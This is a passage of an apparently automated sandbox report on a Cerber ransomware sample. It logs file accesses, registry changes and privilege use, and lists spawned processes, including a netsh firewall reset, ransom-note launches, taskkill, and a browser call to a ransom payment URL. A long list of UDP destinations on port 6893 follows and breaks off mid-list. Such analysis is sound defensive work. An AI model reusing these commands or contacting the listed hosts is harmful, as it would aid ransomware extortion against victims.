| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0b431711740db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9C72C381-AC0A-11EF-AE85-F245C6AC432F} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000d060cc5a75ff8e96d7ffe46ae7ad8aa496a4566dda2e9f7675121c9a0f3b0bfd000000000e80000000020000200000001548255d7085fcce04efe2b9cc19f366b9ad3a8ff856ea9738fe9af92e444b8c200000005f6aa8de2a98c6e4a02cd0e0fc07827f1a6f2d36a32c614967bff5ea3deaa8ee4000000082c623d513283c930f0ee206a730ab2c813285b452e9ea3ec92b90e9e59c01b08fb4799070ae8f5b775a981fb9ee34d871f6347b0383ea7dbfe54a7945d56217 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc500000000002000000000010660000000100002000000019d4fc9514992a776c998274c75bee5202109a4261307bd0cb1be77268a56d73000000000e8000000002000020000000df581443db6dbd3453e21d5c14be74a60d968689b3d11e3737f6359e1d93d6cf90000000a5031d803b8d8cb7cdcd8cb84f7439f49a70db7858b1bbe76aa915a80d4da15c25ee05c5e6dd5028e6a2b6f979b1102511f7f6350bd81180765694d6c903a0c0978229001aeb0f7203b08a3c3140bf9381ababc37110393110362aa78eea52cf79dc07c878b4ca31a1242073e47fb9cdbd1d85fe8f846300134d0fed9959dd295642feba198895c2d856f2d939eadd64400000007382fef5747b967fbaed37865ab7a96e2debb7a37194fada41791974a25d7a83fa07a6d871d89890441d927aed80e99d73ffe386837d6566b7d15f8a99bfd423 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cerber.exe
"C:\Users\Admin\AppData\Local\Temp\cerber.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___75WVLOZ_.hta"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___CXIFPVMR_.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "cerber.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 1 127.0.0.1
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://p27dokhpz2n7nvgr.12hygy.top/7A06-6BFE-6C33-0446-9E59
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2632 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2632 CREDAT:1192967 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| FR | 178.33.158.0:6893 | udp | |
| FR | 178.33.158.1:6893 | udp | |
| FR | 178.33.158.2:6893 | udp | |
| FR | 178.33.158.3:6893 | udp | |
| FR | 178.33.158.4:6893 | udp | |
| FR | 178.33.158.5:6893 | udp | |
| FR | 178.33.158.6:6893 | udp | |
| FR | 178.33.158.7:6893 | udp | |
| FR | 178.33.158.8:6893 | udp | |
| FR | 178.33.158.9:6893 | udp | |
| FR | 178.33.158.10:6893 | udp | |
| FR | 178.33.158.11:6893 | udp | |
| FR | 178.33.158.12:6893 | udp | |
| FR | 178.33.158.13:6893 | udp | |
| FR | 178.33.158.14:6893 | udp | |
| FR | 178.33.158.15:6893 | udp | |
| FR | 178.33.158.16:6893 | udp | |
| FR | 178.33.158.17:6893 | udp | |
| FR | 178.33.158.18:6893 | udp | |
| FR | 178.33.158.19:6893 | udp | |
| FR | 178.33.158.20:6893 | udp | |
| FR | 178.33.158.21:6893 | udp | |
| FR | 178.33.158.22:6893 | udp | |
| FR | 178.33.158.23:6893 | udp | |
| FR | 178.33.158.24:6893 | udp | |
| FR | 178.33.158.25:6893 | udp | |
| FR | 178.33.158.26:6893 | udp | |
| FR | 178.33.158.27:6893 | udp | |
| FR | 178.33.158.28:6893 | udp | |
| FR | 178.33.158.29:6893 | udp | |
| FR | 178.33.158.30:6893 | udp | |
| FR | 178.33.158.31:6893 | udp | |
| FR | 178.33.159.0:6893 | udp | |
| FR | 178.33.159.1:6893 | udp | |
| FR | 178.33.159.2:6893 | udp | |
| FR | 178.33.159.3:6893 | udp | |
| FR | 178.33.159.4:6893 | udp | |
| FR | 178.33.159.5:6893 | udp | |
| FR | 178.33.159.6:6893 | udp | |
| FR | 178.33.159.7:6893 | udp | |
| FR | 178.33.159.8:6893 | udp | |
| FR | 178.33.159.9:6893 | udp | |
| FR | 178.33.159.10:6893 | udp | |
| FR | 178.33.159.11:6893 | udp | |
| FR | 178.33.159.12:6893 | udp | |
| FR | 178.33.159.13:6893 | udp | |
| FR | 178.33.159.14:6893 | udp | |
| FR | 178.33.159.15:6893 | udp | |
| FR | 178.33.159.16:6893 | udp | |
| FR | 178.33.159.17:6893 | udp | |
| FR | 178.33.159.18:6893 | udp | |
| FR | 178.33.159.19:6893 | udp | |
| FR | 178.33.159.20:6893 | udp | |
| FR | 178.33.159.21:6893 | udp | |
| FR | 178.33.159.22:6893 | udp | |
| FR | 178.33.159.23:6893 | udp | |
| FR | 178.33.159.24:6893 | udp | |
| FR | 178.33.159.25:6893 | udp | |
| FR | 178.33.159.26:6893 | udp | |
| FR | 178.33.159.27:6893 | udp | |
| FR | 178.33.159.28:6893 | udp | |
| FR | 178.33.159.29:6893 | udp | |
| FR | 178.33.159.30:6893 | udp | |
| FR | 178.33.159.31:6893 | udp | |
| FR | 178.33.160.0:6893 | udp | |
| FR | 178.33.160.1:6893 | udp | |
| FR | 178.33.160.2:6893 | udp | |
| FR | 178.33.160.3:6893 | udp | |
| FR | 178.33.160.4:6893 | udp | |
| FR | 178.33.160.5:6893 | udp | |
| FR | 178.33.160.6:6893 | udp | |
| FR | 178.33.160.7:6893 | udp | |
| FR | 178.33.160.8:6893 | udp | |
| FR | 178.33.160.9:6893 | udp | |
| FR | 178.33.160.10:6893 | udp | |
| FR | 178.33.160.11:6893 | udp | |
| FR | 178.33.160.12:6893 | udp | |
| FR | 178.33.160.13:6893 | udp | |
| FR | 178.33.160.14:6893 | udp | |
| FR | 178.33.160.15:6893 | udp | |
| FR | 178.33.160.16:6893 | udp | |
| FR | 178.33.160.17:6893 | udp | |
| FR | 178.33.160.18:6893 | udp | |
| FR | 178.33.160.19:6893 | udp | |
| FR | 178.33.160.20:6893 | udp | |
| FR | 178.33.160.21:6893 | udp | |
| FR | 178.33.160.22:6893 | udp | |
| FR | 178.33.160.23:6893 | udp | |
| FR | 178.33.160.24:6893 | udp | |
| FR | 178.33.160.25:6893 | udp | |
| FR | 178.33.160.26:6893 | udp | |
| FR | 178.33.160.27:6893 | udp | |
| FR | 178.33.160.28:6893 | udp | |
| FR | 178.33.160.29:6893 | udp | |
| FR | 178.33.160.30:6893 | udp | |
| FR | 178.33.160.31:6893 | udp | |
| FR | 178.33.160.32:6893 | udp | |
| FR | 178.33.160.33:6893 | udp | |
| FR | 178.33.160.34:6893 | udp | |
| FR | 178.33.160.35:6893 | udp | |
| FR | 178.33.160.36:6893 | udp | |
| FR | 178.33.160.37:6893 | udp | |
| FR | 178.33.160.38:6893 | udp | |
| FR | 178.33.160.39:6893 | udp | |
| FR | 178.33.160.40:6893 | udp | |
| FR | 178.33.160.41:6893 | udp | |
| FR | 178.33.160.42:6893 | udp | |
| FR | 178.33.160.43:6893 | udp | |
| FR | 178.33.160.44:6893 | udp | |
| FR | 178.33.160.45:6893 | udp | |
| FR | 178.33.160.46:6893 | udp | |
| FR | 178.33.160.47:6893 | udp | |
| FR | 178.33.160.48:6893 | udp | |
| FR | 178.33.160.49:6893 | udp | |
| FR | 178.33.160.50:6893 | udp | |
| FR | 178.33.160.51:6893 | udp | |
| FR | 178.33.160.52:6893 | udp | |
| FR | 178.33.160.53:6893 | udp | |
| FR | 178.33.160.54:6893 | udp | |
| FR | 178.33.160.55:6893 | udp | |
| FR | 178.33.160.56:6893 | udp | |
| FR | 178.33.160.57:6893 | udp | |
| FR | 178.33.160.58:6893 | udp | |
| FR | 178.33.160.59:6893 | udp | |
| FR | 178.33.160.60:6893 | udp | |
| FR | 178.33.160.61:6893 | udp | |
| FR | 178.33.160.62:6893 | udp | |
| FR | 178.33.160.63:6893 | udp | |
| FR | 178.33.160.64:6893 | udp | |
| FR | 178.33.160.65:6893 | udp | |
| FR | 178.33.160.66:6893 | udp | |
| FR | 178.33.160.67:6893 | udp | |
| FR | 178.33.160.68:6893 | udp | |
| FR | 178.33.160.69:6893 | udp | |
| FR | 178.33.160.70:6893 | udp | |
| FR | 178.33.160.71:6893 | udp | |
| FR | 178.33.160.72:6893 | udp | |
| FR | 178.33.160.73:6893 | udp | |
| FR | 178.33.160.74:6893 | udp | |
| FR | 178.33.160.75:6893 | udp | |
| FR | 178.33.160.76:6893 | udp | |
| FR | 178.33.160.77:6893 | udp | |
| FR | 178.33.160.78:6893 | udp | |
| FR | 178.33.160.79:6893 | udp | |
| FR | 178.33.160.80:6893 | udp | |
| FR | 178.33.160.81:6893 | udp | |
| FR | 178.33.160.82:6893 | udp | |
| FR | 178.33.160.83:6893 | udp | |
| FR | 178.33.160.84:6893 | udp | |
| FR | 178.33.160.85:6893 | udp | |
| FR | 178.33.160.86:6893 | udp | |
| FR | 178.33.160.87:6893 | udp | |
| FR | 178.33.160.88:6893 | udp | |
| FR | 178.33.160.89:6893 | udp | |
| FR | 178.33.160.90:6893 | udp | |
| FR | 178.33.160.91:6893 | udp | |
| FR | 178.33.160.92:6893 | udp | |
| FR | 178.33.160.93:6893 | udp | |
| FR | 178.33.160.94:6893 | udp | |
| FR | 178.33.160.95:6893 | udp | |
| FR | 178.33.160.96:6893 | udp | |
| FR | 178.33.160.97:6893 | udp | |
| FR | 178.33.160.98:6893 | udp | |
| FR | 178.33.160.99:6893 | udp | |
| FR | 178.33.160.100:6893 | udp | |
| FR | 178.33.160.101:6893 | udp | |
| FR | 178.33.160.102:6893 | udp | |
| FR | 178.33.160.103:6893 | udp | |
| FR | 178.33.160.104:6893 | udp | |
| FR | 178.33.160.105:6893 | udp | |
| FR | 178.33.160.106:6893 | udp | |
| FR | 178.33.160.107:6893 | udp | |
| FR | 178.33.160.108:6893 | udp | |
| FR | 178.33.160.109:6893 | udp | |
| FR | 178.33.160.110:6893 | udp | |
| FR | 178.33.160.111:6893 | udp | |
| FR | 178.33.160.112:6893 | udp | |
| FR | 178.33.160.113:6893 | udp | |
| FR | 178.33.160.114:6893 | udp | |
| FR | 178.33.160.115:6893 | udp | |
| FR | 178.33.160.116:6893 | udp | |
| FR | 178.33.160.117:6893 | udp | |
| FR | 178.33.160.118:6893 | udp | |
| FR | 178.33.160.119:6893 | udp | |
| FR | 178.33.160.120:6893 | udp | |
| FR | 178.33.160.121:6893 | udp | |
| FR | 178.33.160.122:6893 | udp | |
| FR | 178.33.160.123:6893 | udp | |
| FR | 178.33.160.124:6893 | udp | |
| FR | 178.33.160.125:6893 | udp | |
| FR | 178.33.160.126:6893 | udp | |
| FR | 178.33.160.127:6893 | udp | |
| FR | 178.33.160.128:6893 | udp | |
| FR | 178.33.160.129:6893 | udp | |
| FR | 178.33.160.130:6893 | udp | |
| FR | 178.33.160.131:6893 | udp | |
| FR | 178.33.160.132:6893 | udp | |
| FR | 178.33.160.133:6893 | udp | |
| FR | 178.33.160.134:6893 | udp | |
| FR | 178.33.160.135:6893 | udp | |
| FR | 178.33.160.136:6893 | udp | |
| FR | 178.33.160.137:6893 | udp | |
| FR | 178.33.160.138:6893 | udp | |
| FR | 178.33.160.139:6893 | udp | |
| FR | 178.33.160.140:6893 | udp | |
| FR | 178.33.160.141:6893 | udp | |
| FR | 178.33.160.142:6893 | udp | |
| FR | 178.33.160.143:6893 | udp | |
| FR | 178.33.160.144:6893 | udp | |
| FR | 178.33.160.145:6893 | udp | |
| FR | 178.33.160.146:6893 | udp | |
| FR | 178.33.160.147:6893 | udp | |
| FR | 178.33.160.148:6893 | udp | |
| FR | 178.33.160.149:6893 | udp | |
| FR | 178.33.160.150:6893 | udp | |
| FR | 178.33.160.151:6893 | udp | |
| FR | 178.33.160.152:6893 | udp | |
| FR | 178.33.160.153:6893 | udp | |
| FR | 178.33.160.154:6893 | udp | |
| FR | 178.33.160.155:6893 | udp | |
| FR | 178.33.160.156:6893 | udp | |
| FR | 178.33.160.157:6893 | udp | |
| FR | 178.33.160.158:6893 | udp | |
| FR | 178.33.160.159:6893 | udp | |
| FR | 178.33.160.160:6893 | udp | |
| FR | 178.33.160.161:6893 | udp | |
| FR | 178.33.160.162:6893 | udp | |
| FR | 178.33.160.163:6893 | udp | |
| FR | 178.33.160.164:6893 | udp | |
| FR | 178.33.160.165:6893 | udp | |
| FR | 178.33.160.166:6893 | udp | |
| FR | 178.33.160.167:6893 | udp | |
| FR | 178.33.160.168:6893 | udp | |
| FR | 178.33.160.169:6893 | udp | |
| FR | 178.33.160.170:6893 | udp | |
| FR | 178.33.160.171:6893 | udp | |
| FR | 178.33.160.172:6893 | udp | |
| FR | 178.33.160.173:6893 | udp | |
| FR | 178.33.160.174:6893 | udp | |
| FR | 178.33.160.175:6893 | udp | |
| FR | 178.33.160.176:6893 | udp | |
| FR | 178.33.160.177:6893 | udp | |
| FR | 178.33.160.178:6893 | udp | |
| FR | 178.33.160.179:6893 | udp | |
| FR | 178.33.160.180:6893 | udp | |
| FR | 178.33.160.181:6893 | udp | |
| FR | 178.33.160.182:6893 | udp | |
